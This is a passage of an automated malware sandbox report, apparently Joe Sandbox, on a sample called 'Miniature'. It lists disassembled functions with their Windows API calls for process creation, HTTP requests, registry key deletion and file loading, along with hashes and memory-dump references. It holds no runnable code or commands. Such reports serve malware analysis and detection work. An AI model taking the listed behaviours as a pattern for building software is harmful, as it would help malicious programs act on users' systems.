                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                            • Opcode ID: ac24f0c7c775e5012ac8bcce207000e14023f381aaccebaff12217ef33b814f6
                                                                                                                                                                                                                                                                                            • Instruction ID: 69aa786d420dcfb8cc5edff7e89219ede3a601447819d8e678c45c1a705186ad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac24f0c7c775e5012ac8bcce207000e14023f381aaccebaff12217ef33b814f6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77B124316087029FC714EF28C890A6EB7E5BF95728F50491DF5A6C3291EBB0DD84DB92
                                                                                                                                                                                                                                                                                            Function 00C9BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9BBF8
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C9BC10
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C9BC34
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9BC60
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C9BC74
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C9BC96
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9BD92
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C80F4E: GetStdHandle.KERNEL32(000000F6), ref: 00C80F6D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9BDAB
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9BDC6
                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C9BE16
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00C9BE67
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C9BE99
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9BEAA
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9BEBC
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9BECE
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C9BF43
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4a86794473b681377b7f2b450e322d26357d26d0aa41cae8bca9f79a98a5b8e5
                                                                                                                                                                                                                                                                                            • Instruction ID: 8517f3a17c16e66dc192c7166078d00b8fde8c3d426877b15f670a96d7537ac9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a86794473b681377b7f2b450e322d26357d26d0aa41cae8bca9f79a98a5b8e5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDF1C132504300AFCB14EF24D995B6EBBE5BF85314F18855DF89A8B2A2CB30ED45DB52
                                                                                                                                                                                                                                                                                            Function 00C94A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00CADCD0), ref: 00C94B18
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C94B2A
                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00CADCD0), ref: 00C94B4F
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00CADCD0), ref: 00C94B9B
                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,00CADCD0), ref: 00C94C05
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000009), ref: 00C94CBF
                                                                                                                                                                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C94D25
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00C94D4F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                            • Opcode ID: 22048a7e3978aa1cb1a2ba362bce6fabbb2e723d69f2942dfbd91703b0103f94
                                                                                                                                                                                                                                                                                            • Instruction ID: dbdde1f3551a87c8adff38076912bd93af785d12242a399319c29acca4c16b5e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22048a7e3978aa1cb1a2ba362bce6fabbb2e723d69f2942dfbd91703b0103f94
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5121A75A00115EFDF18CF94C888EAEB7B5FF45318F148098E916AB251DB31EE46CBA0
                                                                                                                                                                                                                                                                                            Function 00C1381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00CE29C0), ref: 00C53F72
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00CE29C0), ref: 00C54022
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C54066
                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00C5406F
                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(00CE29C0,00000000,?,00000000,00000000,00000000), ref: 00C54082
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C5408E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 79693dfb28fd573ccab5f2874714510d3dd75dbf7b92d492f0e35b1bdc929877
                                                                                                                                                                                                                                                                                            • Instruction ID: e02b9f456ab496bd667fc0b542cb31c2abe34b7c68d4855bc27b73317f7d3766
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79693dfb28fd573ccab5f2874714510d3dd75dbf7b92d492f0e35b1bdc929877
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4713670A04245FEFB208F69DC89FAABF64FF05368F100206F925661E0C7B19A94DB54
                                                                                                                                                                                                                                                                                            Function 00CA7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,?), ref: 00CA7823
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CA7897
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CA78B9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA78CC
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00CA78ED
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C10000,00000000), ref: 00CA791C
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA7935
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00CA794E
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00CA7955
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CA796D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CA7985
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C12234: GetWindowLongW.USER32(?,000000EB), ref: 00C12242
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                            • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                            • Opcode ID: 65e22e6b3d52aa3a38065fc35221bda7db4a83924080a110420550c4212fb687
                                                                                                                                                                                                                                                                                            • Instruction ID: d7e42c8cb6b924171547e82ce86037089195ea8697b4bad29692d3a0a0f5c16c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65e22e6b3d52aa3a38065fc35221bda7db4a83924080a110420550c4212fb687
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B719D71104245AFD725CF28CC48F6BBBE9FB8A308F04451EF996972A1CB70E905DB11
                                                                                                                                                                                                                                                                                            Function 00CA9B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00CA9BA3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA80AE: ClientToScreen.USER32(?,?), ref: 00CA80D4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA80AE: GetWindowRect.USER32(?,?), ref: 00CA814A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA80AE: PtInRect.USER32(?,?,?), ref: 00CA815A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00CA9C0C
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CA9C17
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CA9C3A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CA9C81
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00CA9C9A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00CA9CB1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00CA9CD3
                                                                                                                                                                                                                                                                                            • DragFinish.SHELL32(?), ref: 00CA9CDA
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00CA9DCD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                            • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                            • Opcode ID: 3458e36dd942726e187e3e5c275493039f4bd086b8713662039e50991b1fae26
                                                                                                                                                                                                                                                                                            • Instruction ID: 76831f33c6b771178d6e3674b4aff1aa17dde897e920681ec1f6d62232a9cc9a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3458e36dd942726e187e3e5c275493039f4bd086b8713662039e50991b1fae26
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C661AB71108305AFC705EF64CC85E9FBBE8EF8A354F40092EF592932A1DB709A49DB52
                                                                                                                                                                                                                                                                                            Function 00C8CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C8CEF5
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C8CF08
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C8CF1C
                                                                                                                                                                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C8CF35
                                                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C8CF78
                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C8CF8E
                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C8CF99
                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C8CFC9
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C8D021
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C8D035
                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00C8D040
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                            • Opcode ID: f3be2b69e756998ae079ec9e9e895dfd25e882c71e1bd0a2c8c323094ea422ae
                                                                                                                                                                                                                                                                                            • Instruction ID: 6634e9aa109bdbb94a900f96a147c81136f4fb5d90d4e92f1329395d83da0de6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3be2b69e756998ae079ec9e9e895dfd25e882c71e1bd0a2c8c323094ea422ae
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC515AB1500608BFEB21AFA1C888BAB7BBCFF09748F00441AF957D7650D734DA45AB64
                                                                                                                                                                                                                                                                                            Function 00CA8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00CA66D6,?,?), ref: 00CA8FEE
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA8FFE
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA9009
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA9016
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00CA9024
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA9033
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00CA903C
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA9043
                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA9054
                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CB0C04,?), ref: 00CA906D
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00CA907D
                                                                                                                                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00CA909D
                                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00CA90CD
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00CA90F5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CA910B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0a8897d7cd920ddf13093f3cf881fec4ba2f4625aa0a7ad9ae93cbd88aab8cac
                                                                                                                                                                                                                                                                                            • Instruction ID: 91963370d8869852c88b6c6b3a3d0128f452a51bc628c81259797874262df15b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a8897d7cd920ddf13093f3cf881fec4ba2f4625aa0a7ad9ae93cbd88aab8cac
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61411675600209AFDB119F65DC89FAE7BB8EB8A759F104058F917D7260DB309E41DB20
                                                                                                                                                                                                                                                                                            Function 00C9C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9C10E,?,?), ref: 00C9D415
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D451
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9C154
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9C1D2
                                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 00C9C26A
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C9C2DE
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C9C2FC
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C9C352
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C9C364
                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C9C382
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C9C3E3
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9C3F4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
